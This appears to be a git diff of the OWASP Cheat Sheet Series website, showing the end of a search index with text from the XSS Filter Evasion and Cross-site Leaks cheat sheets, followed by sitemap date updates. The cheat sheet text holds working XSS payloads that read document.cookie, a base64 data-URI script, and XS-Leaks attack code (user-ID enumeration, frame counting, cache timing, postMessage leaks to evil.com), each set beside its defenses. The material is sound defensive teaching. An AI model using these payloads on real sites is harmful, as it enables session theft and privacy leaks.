"},{"location":"cheatsheets/XSS_Filter_Evasion_Cheat_Sheet.html#content-page-source-code","title":"Content Page Source Code","text":"

a href=\"/Share?content_type=1&title=<%=Encode.forHtmlAttribute(untrusted content title)%>\">Share</a>

"},{"location":"cheatsheets/XSS_Filter_Evasion_Cheat_Sheet.html#share-page-source-code","title":"Share Page Source Code","text":"
<script>\nvar contentType = <%=Request.getParameter(\"content_type\")%>;\nvar title = \"<%=Encode.forJavaScript(request.getParameter(\"title\"))%>\";\n...\n//some user agreement and sending to server logic might be here\n...\n</script>\n
"},{"location":"cheatsheets/XSS_Filter_Evasion_Cheat_Sheet.html#content-page-output","title":"Content Page Output","text":"

In this case, if the attacker sets the untrusted content title to \u201cThis is a regular title&content_type=1;alert(1)\u201d, the link in the \"Content\" page would be this:

<a href=\"/share?content_type=1&title=This is a regular title&amp;content_type=1;alert(1)\">Share</a>

"},{"location":"cheatsheets/XSS_Filter_Evasion_Cheat_Sheet.html#share-page-output","title":"Share Page Output","text":"

And the \"Share\" page output could be this:

<script>\nvar contentType = 1; alert(1);\nvar title = \"This is a regular title\";\n\u2026\n//some user agreement and sending to server logic might be here\n\u2026\n</script>\n

As a result, the main flaw in this example is trusting content_type in the \"Share\" page without proper encoding or validation. HTTP Parameter Pollution could increase the impact of the XSS flaw by promoting it from a reflected XSS to a stored XSS.

"},{"location":"cheatsheets/XSS_Filter_Evasion_Cheat_Sheet.html#character-escape-sequences","title":"Character Escape Sequences","text":"

All the possible combinations of the character \"\\<\" in HTML and JavaScript. Most of these won't render out of the box, but many of them can get rendered in certain circumstances as seen above.

"},{"location":"cheatsheets/XSS_Filter_Evasion_Cheat_Sheet.html#methods-to-bypass-waf-cross-site-scripting","title":"Methods to Bypass WAF \u2013 Cross-Site Scripting","text":""},{"location":"cheatsheets/XSS_Filter_Evasion_Cheat_Sheet.html#general-issues","title":"General issues","text":""},{"location":"cheatsheets/XSS_Filter_Evasion_Cheat_Sheet.html#stored-xss","title":"Stored XSS","text":"

If an attacker manages to push XSS through the filter, the WAF won't be able to prevent the attack.

"},{"location":"cheatsheets/XSS_Filter_Evasion_Cheat_Sheet.html#reflected-xss-in-javascript","title":"Reflected XSS in JavaScript","text":"
Example: <script> ... setTimeout(\\\\\"writetitle()\\\\\",$\\_GET\\[xss\\]) ... </script>\nExploitation:\u00a0/?xss=500);\u00a0alert(document.cookie);//\n
"},{"location":"cheatsheets/XSS_Filter_Evasion_Cheat_Sheet.html#dom-based-xss","title":"DOM-based XSS","text":"
Example:\u00a0<script> ... eval($\\_GET\\[xss\\]); ... </script>\nExploitation:\u00a0/?xss=document.cookie\n
"},{"location":"cheatsheets/XSS_Filter_Evasion_Cheat_Sheet.html#xss-via-request-redirection","title":"XSS via request Redirection","text":"
...\nheader('Location:\u00a0'.$_GET['param']);\n...\n

As well as:

..\nheader('Refresh:\u00a00;\u00a0URL='.$_GET['param']); \n...\n

/?param=<javascript:alert(document.cookie>)

/?param=<data:text/html;base64,PHNjcmlwdD5hbGVydCgnWFNTJyk8L3NjcmlwdD4=

"},{"location":"cheatsheets/XSS_Filter_Evasion_Cheat_Sheet.html#waf-bypass-strings-for-xss","title":"WAF ByPass Strings for XSS","text":""},{"location":"cheatsheets/XSS_Filter_Evasion_Cheat_Sheet.html#filter-bypass-alert-obfuscation","title":"Filter Bypass Alert Obfuscation","text":""},{"location":"cheatsheets/XS_Leaks_Cheat_Sheet.html","title":"Cross-site leaks Cheat Sheet","text":""},{"location":"cheatsheets/XS_Leaks_Cheat_Sheet.html#introduction","title":"Introduction","text":"

This article describes examples of attacks and defenses against the cross-site leaks vulnerability (XS-Leaks). Since this vulnerability is based on core mechanisms of modern web browsers, it's also called a browser side-channel attack. XS-Leaks attacks seek to exploit seemingly insignificant information that is exchanged in cross-site communications between sites. This information can be used to infer answers to questions about the victim's user account. Please take a look at the examples provided below:

On the basis of such questions, the attacker might try to deduce the answers, depending on the application's context. In most cases, the answers will be in binary form (yes or no). The impact of this vulnerability depends strongly on the application's risk profile. Despite this, XS Leaks may pose a real threat to user privacy and anonymity.

"},{"location":"cheatsheets/XS_Leaks_Cheat_Sheet.html#attack-vector","title":"Attack vector","text":""},{"location":"cheatsheets/XS_Leaks_Cheat_Sheet.html#same-origin-policy-sop","title":"Same Origin Policy (SOP)","text":"

Before describing attacks, it's good to understand one of the most critical security mechanisms in browsers - the Same-Origin Policy. A few key aspects:

Origin A Origin B Same origin? https://example.com http://sub.example.com No, different hosts https://example.com https://example.com:443 Yes! Implicit port in Origin A

Although the SOP principle protects us from accessing information in cross-origin communication, XS-Leaks attacks can still infer some information from residual data.

"},{"location":"cheatsheets/XS_Leaks_Cheat_Sheet.html#samesite-cookies","title":"SameSite Cookies","text":"

The SameSite attribute of a cookie tells the browser whether it should include the cookie in requests coming from other sites. The SameSite attribute takes the following values:

It is worth mentioning that Chromium-based browsers treat cookies without a SameSite attribute as Lax by default.

SameSite cookies are a strong defense-in-depth mechanism against some classes of XS-Leaks and CSRF attacks; they can significantly reduce the attack surface, but may not completely eliminate these attacks (see, e.g., window-based XS-Leak attacks like frame counting and navigation).
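
As a purely illustrative sketch (the cookie name and value below are hypothetical, not taken from this cheat sheet), a session cookie hardened with the SameSite attribute could be issued like this:

Set-Cookie: session=hypothetical_value; Path=/; Secure; HttpOnly; SameSite=Lax\n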

"},{"location":"cheatsheets/XS_Leaks_Cheat_Sheet.html#how-do-we-know-that-two-sites-are-samesite","title":"How do we know that two sites are SameSite?","text":"

In the context of the SameSite attribute, we consider the site to be the combination of the TLD (top-level domain) and the domain name before it. For example:

Full URL Site (eTLD+1) https://example.com:443/data?query=test example.com

Why are we talking about eTLD+1 and not just TLD+1? It's because of domains like .github.io or .eu.org. Such parts are not atomic enough to be compared well. For this reason, a list of \"effective\" TLDs (eTLDs) was created and can be found here.

Sites that have the same eTLD+1 are considered SameSite, examples:

Origin A Origin B SameSite? https://example.com http://example.com Yes, schemes don't matter https://evil.net https://example.com No, different eTLD+1 https://sub.example.com https://data.example.com Yes, subdomains don't matter

For more information about SameSite, see the excellent article Understanding \"same-site\".

"},{"location":"cheatsheets/XS_Leaks_Cheat_Sheet.html#attacks-using-the-element-id-attribute","title":"Attacks using the element ID attribute","text":"

Elements in the DOM can have an ID attribute that is unique within the document. For example:

<button id=\"pro\">Pro account</button>\n

The browser will automatically focus an element with a given ID if we append a hash fragment to the URL, e.g. https://example.com#pro. What's more, the JavaScript focus event gets fired. The attacker may try to embed the application in an iframe with a specific source on a page they control:

then add a listener in the main document for the blur event (the opposite of focus). When the victim visits the attacker's site, the blur event gets fired, and the attacker can conclude that the victim has a pro account.
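
A minimal sketch of this attack, assuming the victim application at https://example.com renders the #pro button shown above and can be framed (the URL and log message are hypothetical):

<iframe src=\"https://example.com#pro\"></iframe>\n<script>\n// If the framed page focuses the element with id \"pro\", the top document loses focus\nwindow.addEventListener('blur', () => {\nconsole.log('blur fired - the victim likely has a pro account');\n});\n</script>\n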

"},{"location":"cheatsheets/XS_Leaks_Cheat_Sheet.html#defense","title":"Defense","text":""},{"location":"cheatsheets/XS_Leaks_Cheat_Sheet.html#framing-protection","title":"Framing protection","text":"

If you don't need other origins to embed your application in a frame, you can consider using one of two mechanisms:

Setting up framing protection effectively blocks the ability to embed your application in a frame on an attacker-controlled origin and protects against other attacks like Clickjacking.
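
For instance, either of the following response headers would prevent other origins from framing your application; the values shown are only a sketch of typical choices, with the Content-Security-Policy form being the more modern mechanism:

X-Frame-Options: DENY\nContent-Security-Policy: frame-ancestors 'none'\n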

"},{"location":"cheatsheets/XS_Leaks_Cheat_Sheet.html#fetch-metadata-sec-fetch-dest","title":"Fetch metadata (Sec-Fetch-Dest)","text":"

The Sec-Fetch-Dest header provides information about the end goal of the request. This header is included automatically by the browser and is one of the headers within the Fetch Metadata standard.

With Sec-Fetch-Dest, you can build your own effective resource isolation policies, for example:

app.get('/', (req, res) => {\nif (req.get('Sec-Fetch-Dest') === 'iframe') {\nreturn res.sendStatus(403);\n}\nres.send({\nmessage: 'Hello!'\n});\n});\n

If you want to use headers from the Fetch Metadata standard, make sure that your users' browsers support this standard (you can check it here). Also, think about using an appropriate fallback in code if the Sec-Fetch-* header is not included in the request, as sketched below.
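
One possible shape of such a fallback, assuming the same Express-style handler as above; when the browser does not send Fetch Metadata at all, you must decide on your own default (allowing the request, as done here, is just one option):

app.get('/', (req, res) => {\nconst dest = req.get('Sec-Fetch-Dest');\n// Older browsers may not send Fetch Metadata headers at all\nif (dest === undefined) {\n// Fallback policy: allow, log, or apply additional checks - your choice\nreturn res.send({ message: 'Hello!' });\n}\nif (dest === 'iframe') {\nreturn res.sendStatus(403);\n}\nres.send({ message: 'Hello!' });\n});\n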

"},{"location":"cheatsheets/XS_Leaks_Cheat_Sheet.html#attacks-based-on-error-events","title":"Attacks based on error events","text":"

Embedding resources from other origins is generally allowed. For example, you can embed an image, or even a script, from another origin on your page. What is not permitted is reading a cross-origin resource, due to the SOP.

When the browser sends a request for a resource, the server processes the request and decides on the response (e.g. 200 OK or 404 NOT FOUND). The browser receives the HTTP response and, based on that, the appropriate JavaScript event is fired (onload or onerror).

In this way, we can try to load resources and, based on the response status, infer whether they exist or not in the context of the logged-in victim. Let's look at the following situation:

Given the above example, an attacker can use JavaScript on an origin they control to guess the victim's ID by enumerating over all the values in a simple loop.

function checkId(id) {\nconst script = document.createElement('script');\nscript.src = `https://example.com/api/users/${id}`;\nscript.onload = () => {\nconsole.log(`Logged user id: ${id}`);\n};\ndocument.body.appendChild(script);\n}\n\n// Generate array [0, 1, ..., 40]\nconst ids = Array(41)\n.fill()\n.map((_, i) => i + 0);\n\nfor (const id of ids) {\ncheckId(id);\n}\n

Note that the attacker here does not care about reading the response body; it would not even be able to, thanks to solid isolation mechanisms in browsers such as Cross-Origin Resource Blocking. All it needs is the success signal it receives when the onload event fires.

"},{"location":"cheatsheets/XS_Leaks_Cheat_Sheet.html#defense_1","title":"Defense","text":""},{"location":"cheatsheets/XS_Leaks_Cheat_Sheet.html#subresource-protection","title":"SubResource protection","text":"

In some cases, a mechanism of special unique tokens may be implemented to protect sensitive endpoints:

/api/users/1234?token=be930b8cfb5011eb9a030242ac130003\n

Although it is pretty effective, this solution generates significant overhead to implement properly.

"},{"location":"cheatsheets/XS_Leaks_Cheat_Sheet.html#fetch-metadata-sec-fetch-site","title":"Fetch metadata (Sec-Fetch-Site)","text":"

This header specifies where the request was sent from, and it takes the following values:

Like Sec-Fetch-Dest, this header is automatically appended by the browser to each request and is part of the Fetch Metadata standard. Example usage:

app.get('/api/users/:id', authorization, (req, res) => {\nif (req.get('Sec-Fetch-Site') === 'cross-site') {\nreturn res.sendStatus(403);\n}\n\n// ... more code\n\nreturn res.send({ id: 1234, name: 'John', role: 'admin' });\n});\n
"},{"location":"cheatsheets/XS_Leaks_Cheat_Sheet.html#cross-origin-resource-policy-corp","title":"Cross-Origin-Resource-Policy (CORP)","text":"

If the server returns this header with the appropriate value, the browser will not allow other applications to load resources (even static images) from our site or origin. Possible values:

Read more about CORP here.
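
As an illustrative example, serving a static asset with the header below (same-origin being one of the possible values referenced above) tells the browser that only pages from the same origin may embed it:

Cross-Origin-Resource-Policy: same-origin\n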

"},{"location":"cheatsheets/XS_Leaks_Cheat_Sheet.html#attacks-on-postmessage-communication","title":"Attacks on postMessage communication","text":"

Sometimes, in controlled situations, we would like to exchange information between different origins despite the SOP. For that, we can use the postMessage mechanism. See the example below:

// Origin: http://example.com\nconst site = new URLSearchParams(window.location.search).get('site'); // https://evil.com\nconst popup = window.open(site);\npopup.postMessage('secret message!', '*');\n\n// Origin: https://evil.com\nwindow.addEventListener('message', e => {\nalert(e.data) // secret message! - leak\n});\n
"},{"location":"cheatsheets/XS_Leaks_Cheat_Sheet.html#defense_2","title":"Defense","text":""},{"location":"cheatsheets/XS_Leaks_Cheat_Sheet.html#specify-strict-targetorigin","title":"Specify strict targetOrigin","text":"

To avoid situations like the one above, where an attacker manages to get a reference to a window in order to receive a message, always specify the exact targetOrigin in postMessage. Passing the wildcard * as the targetOrigin allows any origin to receive the message.

// Origin: http://example.com\nconst site = new URLSearchParams(window.location.search).get('site'); // https://evil.com\nconst popup = window.open(site);\npopup.postMessage('secret message!', 'https://sub.example.com');\n\n// Origin: https://evil.com\nwindow.addEventListener('message', e => {\nalert(e.data) // no data!\n});\n
"},{"location":"cheatsheets/XS_Leaks_Cheat_Sheet.html#frame-counting-attacks","title":"Frame counting attacks","text":"

Information about the number of loaded frames in a window can be a source of leakage. Take, for example, an application that loads search results into a frame; if the results are empty, the frame does not appear.

An attacker can get information about the number of loaded frames in a window by counting the frames in the window.frames object.

So finally, an attacker can obtain an email list and, in a simple loop, open subsequent windows and count the number of frames. If the number of frames in an opened window is equal to 1, the email is in the database of the application used by the victim.
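
A minimal sketch of that loop, assuming a hypothetical search page that renders exactly one result frame when an email is found (the URL pattern, email list, and timing are illustrative only):

const emails = ['john@example.com', 'jane@example.com']; // hypothetical list\nfor (const email of emails) {\nconst win = window.open('https://example.com/admin/customers?search=' + encodeURIComponent(email));\n// Wait for the page to load, then count frames; window.frames.length is readable cross-origin\nsetTimeout(() => {\nif (win.frames.length === 1) {\nconsole.log(email + ' is in the application database');\n}\nwin.close();\n}, 2000);\n}\n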

"},{"location":"cheatsheets/XS_Leaks_Cheat_Sheet.html#defense_3","title":"Defense","text":""},{"location":"cheatsheets/XS_Leaks_Cheat_Sheet.html#cross-origin-opener-policy-coop","title":"Cross-Origin-Opener-Policy (COOP)","text":"

Setting this header will prevent cross-origin documents from being opened in the same browsing context group. This solution ensures that document A, when opening another document, will not have access to its window object. Possible values:

If the server returns, for example, the same-origin COOP header, the attack fails:

const win = window.open('https://example.com/admin/customers?search=john%40example.com');\nconsole.log(win.frames.length) // Cannot read property 'length' of null\n
"},{"location":"cheatsheets/XS_Leaks_Cheat_Sheet.html#attacks-using-browser-cache","title":"Attacks using browser cache","text":"

The browser cache helps to significantly reduce the time it takes for a page to load when it is revisited. However, it can also pose a risk of information leakage. If an attacker is able to detect whether a resource was loaded from the cache based on the load time, they will be able to draw some conclusions from it.

The principle is simple: a resource loaded from the cache will load incomparably faster than one loaded from the server.

An attacker can embed on their site a resource that is only accessible to a user with the admin role. Then, using JavaScript, they can read the load time of that particular resource and, based on this information, deduce whether the resource is in the cache or not.

    // Threshold above which we consider a resource to have loaded from the server\n// const THRESHOLD = ...\n\nconst adminImagePerfEntry = window.performance\n.getEntries()\n.filter((entry) => entry.name.endsWith('admin.svg'));\n\nif (adminImagePerfEntry.duration < THRESHOLD) {\nconsole.log('Image loaded from cache!')\n}\n
"},{"location":"cheatsheets/XS_Leaks_Cheat_Sheet.html#defense_4","title":"Defense","text":""},{"location":"cheatsheets/XS_Leaks_Cheat_Sheet.html#unpredictable-tokens-for-images","title":"Unpredictable tokens for images","text":"

This technique works well when you want the resources to remain cacheable for the user, while an attacker cannot find out whether they are cached, because the token is unpredictable:

/avatars/admin.svg?token=be930b8cfb5011eb9a030242ac130003\n
"},{"location":"cheatsheets/XS_Leaks_Cheat_Sheet.html#using-the-cache-control-header","title":"Using the Cache-Control header","text":"

You can disable the cache mechanism if you accept the degraded performance caused by reloading resources from the server every time a user visits the site. To disable caching for resources you want to protect, set the response header Cache-Control: no-store.
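
A small sketch, reusing the Express-style convention from the earlier examples (the route and file path are hypothetical):

app.get('/avatars/admin.svg', (req, res) => {\n// Prevent the browser from storing this sensitive resource in its cache\nres.set('Cache-Control', 'no-store');\nres.sendFile('/static/avatars/admin.svg'); // hypothetical absolute path\n});\n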

"},{"location":"cheatsheets/XS_Leaks_Cheat_Sheet.html#quick-recommendations","title":"Quick recommendations","text":""},{"location":"cheatsheets/XS_Leaks_Cheat_Sheet.html#references","title":"References","text":""},{"location":"cheatsheets/XS_Leaks_Cheat_Sheet.html#xs-leaks","title":"XS Leaks","text":""},{"location":"cheatsheets/XS_Leaks_Cheat_Sheet.html#fetch-metadata","title":"Fetch Metadata","text":""},{"location":"cheatsheets/XS_Leaks_Cheat_Sheet.html#framing-protection_1","title":"Framing protection","text":""},{"location":"cheatsheets/XS_Leaks_Cheat_Sheet.html#samesite","title":"SameSite","text":""},{"location":"cheatsheets/XS_Leaks_Cheat_Sheet.html#coop-and-corp-header","title":"COOP and CORP header","text":""}]} \ No newline at end of file diff --git a/sitemap.xml b/sitemap.xml index aa7c6b7cf3..0e0532f32c 100644 --- a/sitemap.xml +++ b/sitemap.xml @@ -2,457 +2,457 @@ https://cheatsheetseries.owasp.org/index.html - 2023-07-07 + 2023-07-10 daily https://cheatsheetseries.owasp.org/Glossary.html - 2023-07-07 + 2023-07-10 daily https://cheatsheetseries.owasp.org/IndexASVS.html - 2023-07-07 + 2023-07-10 daily https://cheatsheetseries.owasp.org/IndexMASVS.html - 2023-07-07 + 2023-07-10 daily https://cheatsheetseries.owasp.org/IndexProactiveControls.html - 2023-07-07 + 2023-07-10 daily https://cheatsheetseries.owasp.org/IndexTopTen.html - 2023-07-07 + 2023-07-10 daily https://cheatsheetseries.owasp.org/cheatsheets/AJAX_Security_Cheat_Sheet.html - 2023-07-07 + 2023-07-10 daily https://cheatsheetseries.owasp.org/cheatsheets/Abuse_Case_Cheat_Sheet.html - 2023-07-07 + 2023-07-10 daily https://cheatsheetseries.owasp.org/cheatsheets/Access_Control_Cheat_Sheet.html - 2023-07-07 + 2023-07-10 daily https://cheatsheetseries.owasp.org/cheatsheets/Attack_Surface_Analysis_Cheat_Sheet.html - 2023-07-07 + 2023-07-10 daily https://cheatsheetseries.owasp.org/cheatsheets/Authentication_Cheat_Sheet.html - 2023-07-07 + 2023-07-10 daily https://cheatsheetseries.owasp.org/cheatsheets/Authorization_Cheat_Sheet.html - 2023-07-07 + 2023-07-10 daily https://cheatsheetseries.owasp.org/cheatsheets/Authorization_Testing_Automation_Cheat_Sheet.html - 2023-07-07 + 2023-07-10 daily https://cheatsheetseries.owasp.org/cheatsheets/Bean_Validation_Cheat_Sheet.html - 2023-07-07 + 2023-07-10 daily https://cheatsheetseries.owasp.org/cheatsheets/C-Based_Toolchain_Hardening_Cheat_Sheet.html - 2023-07-07 + 2023-07-10 daily https://cheatsheetseries.owasp.org/cheatsheets/Choosing_and_Using_Security_Questions_Cheat_Sheet.html - 2023-07-07 + 2023-07-10 daily https://cheatsheetseries.owasp.org/cheatsheets/Clickjacking_Defense_Cheat_Sheet.html - 2023-07-07 + 2023-07-10 daily https://cheatsheetseries.owasp.org/cheatsheets/Content_Security_Policy_Cheat_Sheet.html - 2023-07-07 + 2023-07-10 daily https://cheatsheetseries.owasp.org/cheatsheets/Credential_Stuffing_Prevention_Cheat_Sheet.html - 2023-07-07 + 2023-07-10 daily https://cheatsheetseries.owasp.org/cheatsheets/Cross-Site_Request_Forgery_Prevention_Cheat_Sheet.html - 2023-07-07 + 2023-07-10 daily https://cheatsheetseries.owasp.org/cheatsheets/Cross_Site_Scripting_Prevention_Cheat_Sheet.html - 2023-07-07 + 2023-07-10 daily https://cheatsheetseries.owasp.org/cheatsheets/Cryptographic_Storage_Cheat_Sheet.html - 2023-07-07 + 2023-07-10 daily https://cheatsheetseries.owasp.org/cheatsheets/DOM_Clobbering_Prevention_Cheat_Sheet.html - 2023-07-07 + 2023-07-10 daily https://cheatsheetseries.owasp.org/cheatsheets/DOM_based_XSS_Prevention_Cheat_Sheet.html - 2023-07-07 + 2023-07-10 daily 
https://cheatsheetseries.owasp.org/cheatsheets/Database_Security_Cheat_Sheet.html - 2023-07-07 + 2023-07-10 daily https://cheatsheetseries.owasp.org/cheatsheets/Denial_of_Service_Cheat_Sheet.html - 2023-07-07 + 2023-07-10 daily https://cheatsheetseries.owasp.org/cheatsheets/Deserialization_Cheat_Sheet.html - 2023-07-07 + 2023-07-10 daily https://cheatsheetseries.owasp.org/cheatsheets/Django_REST_Framework_Cheat_Sheet.html - 2023-07-07 + 2023-07-10 daily https://cheatsheetseries.owasp.org/cheatsheets/Docker_Security_Cheat_Sheet.html - 2023-07-07 + 2023-07-10 daily https://cheatsheetseries.owasp.org/cheatsheets/DotNet_Security_Cheat_Sheet.html - 2023-07-07 + 2023-07-10 daily https://cheatsheetseries.owasp.org/cheatsheets/Error_Handling_Cheat_Sheet.html - 2023-07-07 + 2023-07-10 daily https://cheatsheetseries.owasp.org/cheatsheets/File_Upload_Cheat_Sheet.html - 2023-07-07 + 2023-07-10 daily https://cheatsheetseries.owasp.org/cheatsheets/Forgot_Password_Cheat_Sheet.html - 2023-07-07 + 2023-07-10 daily https://cheatsheetseries.owasp.org/cheatsheets/GraphQL_Cheat_Sheet.html - 2023-07-07 + 2023-07-10 daily https://cheatsheetseries.owasp.org/cheatsheets/HTML5_Security_Cheat_Sheet.html - 2023-07-07 + 2023-07-10 daily https://cheatsheetseries.owasp.org/cheatsheets/HTTP_Headers_Cheat_Sheet.html - 2023-07-07 + 2023-07-10 daily https://cheatsheetseries.owasp.org/cheatsheets/HTTP_Strict_Transport_Security_Cheat_Sheet.html - 2023-07-07 + 2023-07-10 daily https://cheatsheetseries.owasp.org/cheatsheets/Infrastructure_as_Code_Security_Cheat_Sheet.html - 2023-07-07 + 2023-07-10 daily https://cheatsheetseries.owasp.org/cheatsheets/Injection_Prevention_Cheat_Sheet.html - 2023-07-07 + 2023-07-10 daily https://cheatsheetseries.owasp.org/cheatsheets/Injection_Prevention_in_Java_Cheat_Sheet.html - 2023-07-07 + 2023-07-10 daily https://cheatsheetseries.owasp.org/cheatsheets/Input_Validation_Cheat_Sheet.html - 2023-07-07 + 2023-07-10 daily https://cheatsheetseries.owasp.org/cheatsheets/Insecure_Direct_Object_Reference_Prevention_Cheat_Sheet.html - 2023-07-07 + 2023-07-10 daily https://cheatsheetseries.owasp.org/cheatsheets/JAAS_Cheat_Sheet.html - 2023-07-07 + 2023-07-10 daily https://cheatsheetseries.owasp.org/cheatsheets/JSON_Web_Token_for_Java_Cheat_Sheet.html - 2023-07-07 + 2023-07-10 daily https://cheatsheetseries.owasp.org/cheatsheets/Java_Security_Cheat_Sheet.html - 2023-07-07 + 2023-07-10 daily https://cheatsheetseries.owasp.org/cheatsheets/Key_Management_Cheat_Sheet.html - 2023-07-07 + 2023-07-10 daily https://cheatsheetseries.owasp.org/cheatsheets/Kubernetes_Security_Cheat_Sheet.html - 2023-07-07 + 2023-07-10 daily https://cheatsheetseries.owasp.org/cheatsheets/LDAP_Injection_Prevention_Cheat_Sheet.html - 2023-07-07 + 2023-07-10 daily https://cheatsheetseries.owasp.org/cheatsheets/Laravel_Cheat_Sheet.html - 2023-07-07 + 2023-07-10 daily https://cheatsheetseries.owasp.org/cheatsheets/Logging_Cheat_Sheet.html - 2023-07-07 + 2023-07-10 daily https://cheatsheetseries.owasp.org/cheatsheets/Logging_Vocabulary_Cheat_Sheet.html - 2023-07-07 + 2023-07-10 daily https://cheatsheetseries.owasp.org/cheatsheets/Mass_Assignment_Cheat_Sheet.html - 2023-07-07 + 2023-07-10 daily https://cheatsheetseries.owasp.org/cheatsheets/Microservices_Security_Cheat_Sheet.html - 2023-07-07 + 2023-07-10 daily https://cheatsheetseries.owasp.org/cheatsheets/Microservices_based_Security_Arch_Doc_Cheat_Sheet.html - 2023-07-07 + 2023-07-10 daily https://cheatsheetseries.owasp.org/cheatsheets/Multifactor_Authentication_Cheat_Sheet.html - 
2023-07-07 + 2023-07-10 daily https://cheatsheetseries.owasp.org/cheatsheets/NPM_Security_Cheat_Sheet.html - 2023-07-07 + 2023-07-10 daily https://cheatsheetseries.owasp.org/cheatsheets/Network_Segmentation_Cheat_Sheet.html - 2023-07-07 + 2023-07-10 daily https://cheatsheetseries.owasp.org/cheatsheets/NodeJS_Docker_Cheat_Sheet.html - 2023-07-07 + 2023-07-10 daily https://cheatsheetseries.owasp.org/cheatsheets/Nodejs_Security_Cheat_Sheet.html - 2023-07-07 + 2023-07-10 daily https://cheatsheetseries.owasp.org/cheatsheets/OS_Command_Injection_Defense_Cheat_Sheet.html - 2023-07-07 + 2023-07-10 daily https://cheatsheetseries.owasp.org/cheatsheets/PHP_Configuration_Cheat_Sheet.html - 2023-07-07 + 2023-07-10 daily https://cheatsheetseries.owasp.org/cheatsheets/Password_Storage_Cheat_Sheet.html - 2023-07-07 + 2023-07-10 daily https://cheatsheetseries.owasp.org/cheatsheets/Pinning_Cheat_Sheet.html - 2023-07-07 + 2023-07-10 daily https://cheatsheetseries.owasp.org/cheatsheets/Prototype_Pollution_Prevention_Cheat_Sheet.html - 2023-07-07 + 2023-07-10 daily https://cheatsheetseries.owasp.org/cheatsheets/Query_Parameterization_Cheat_Sheet.html - 2023-07-07 + 2023-07-10 daily https://cheatsheetseries.owasp.org/cheatsheets/REST_Assessment_Cheat_Sheet.html - 2023-07-07 + 2023-07-10 daily https://cheatsheetseries.owasp.org/cheatsheets/REST_Security_Cheat_Sheet.html - 2023-07-07 + 2023-07-10 daily https://cheatsheetseries.owasp.org/cheatsheets/Ruby_on_Rails_Cheat_Sheet.html - 2023-07-07 + 2023-07-10 daily https://cheatsheetseries.owasp.org/cheatsheets/SAML_Security_Cheat_Sheet.html - 2023-07-07 + 2023-07-10 daily https://cheatsheetseries.owasp.org/cheatsheets/SQL_Injection_Prevention_Cheat_Sheet.html - 2023-07-07 + 2023-07-10 daily https://cheatsheetseries.owasp.org/cheatsheets/Secrets_Management_Cheat_Sheet.html - 2023-07-07 + 2023-07-10 daily https://cheatsheetseries.owasp.org/cheatsheets/Secure_Cloud_Architecture_Cheat_Sheet.html - 2023-07-07 + 2023-07-10 daily https://cheatsheetseries.owasp.org/cheatsheets/Secure_Product_Design_Cheat_Sheet.html - 2023-07-07 + 2023-07-10 daily https://cheatsheetseries.owasp.org/cheatsheets/Securing_Cascading_Style_Sheets_Cheat_Sheet.html - 2023-07-07 + 2023-07-10 daily https://cheatsheetseries.owasp.org/cheatsheets/Server_Side_Request_Forgery_Prevention_Cheat_Sheet.html - 2023-07-07 + 2023-07-10 daily https://cheatsheetseries.owasp.org/cheatsheets/Session_Management_Cheat_Sheet.html - 2023-07-07 + 2023-07-10 daily https://cheatsheetseries.owasp.org/cheatsheets/TLS_Cipher_String_Cheat_Sheet.html - 2023-07-07 + 2023-07-10 daily https://cheatsheetseries.owasp.org/cheatsheets/Third_Party_Javascript_Management_Cheat_Sheet.html - 2023-07-07 + 2023-07-10 daily https://cheatsheetseries.owasp.org/cheatsheets/Threat_Modeling_Cheat_Sheet.html - 2023-07-07 + 2023-07-10 daily https://cheatsheetseries.owasp.org/cheatsheets/Transaction_Authorization_Cheat_Sheet.html - 2023-07-07 + 2023-07-10 daily https://cheatsheetseries.owasp.org/cheatsheets/Transport_Layer_Protection_Cheat_Sheet.html - 2023-07-07 + 2023-07-10 daily https://cheatsheetseries.owasp.org/cheatsheets/Unvalidated_Redirects_and_Forwards_Cheat_Sheet.html - 2023-07-07 + 2023-07-10 daily https://cheatsheetseries.owasp.org/cheatsheets/User_Privacy_Protection_Cheat_Sheet.html - 2023-07-07 + 2023-07-10 daily https://cheatsheetseries.owasp.org/cheatsheets/Virtual_Patching_Cheat_Sheet.html - 2023-07-07 + 2023-07-10 daily https://cheatsheetseries.owasp.org/cheatsheets/Vulnerability_Disclosure_Cheat_Sheet.html - 2023-07-07 + 
2023-07-10 daily https://cheatsheetseries.owasp.org/cheatsheets/Vulnerable_Dependency_Management_Cheat_Sheet.html - 2023-07-07 + 2023-07-10 daily https://cheatsheetseries.owasp.org/cheatsheets/Web_Service_Security_Cheat_Sheet.html - 2023-07-07 + 2023-07-10 daily https://cheatsheetseries.owasp.org/cheatsheets/XML_External_Entity_Prevention_Cheat_Sheet.html - 2023-07-07 + 2023-07-10 daily https://cheatsheetseries.owasp.org/cheatsheets/XML_Security_Cheat_Sheet.html - 2023-07-07 + 2023-07-10 daily https://cheatsheetseries.owasp.org/cheatsheets/XSS_Filter_Evasion_Cheat_Sheet.html - 2023-07-07 + 2023-07-10 daily https://cheatsheetseries.owasp.org/cheatsheets/XS_Leaks_Cheat_Sheet.html - 2023-07-07 + 2023-07-10 daily \ No newline at end of file diff --git a/sitemap.xml.gz b/sitemap.xml.gz index 29e5121101..b4da4728d7 100644 Binary files a/sitemap.xml.gz and b/sitemap.xml.gz differ